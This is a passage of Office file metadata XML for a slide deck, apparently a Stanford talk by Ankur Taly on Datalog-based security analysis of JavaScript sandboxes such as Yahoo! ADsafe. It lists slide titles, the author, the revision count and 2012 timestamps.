      <vt:lpstr>Express Analysis in Datalog (Whaley et al.)</vt:lpstr>
      <vt:lpstr>Complete set of Predicates</vt:lpstr>
      <vt:lpstr>Analyzing eval</vt:lpstr>
      <vt:lpstr>Soundness of our Decision Procedure</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Analysis Targets</vt:lpstr>
      <vt:lpstr>Yahoo! Adsafe</vt:lpstr>
      <vt:lpstr>Analyzing ADSafe API Implementation</vt:lpstr>
      <vt:lpstr>Exploit</vt:lpstr>
      <vt:lpstr>Fixing the Attack</vt:lpstr>
      <vt:lpstr>Conclusions and Future Work</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Stanford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Ankur Taly</dc:creator>
  <cp:lastModifiedBy>Ankur Taly</cp:lastModifiedBy>
  <cp:revision>1694</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-02-16T05:46:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-02-16T05:52:40Z</dcterms:modified>
</cp:coreProperties>
</file>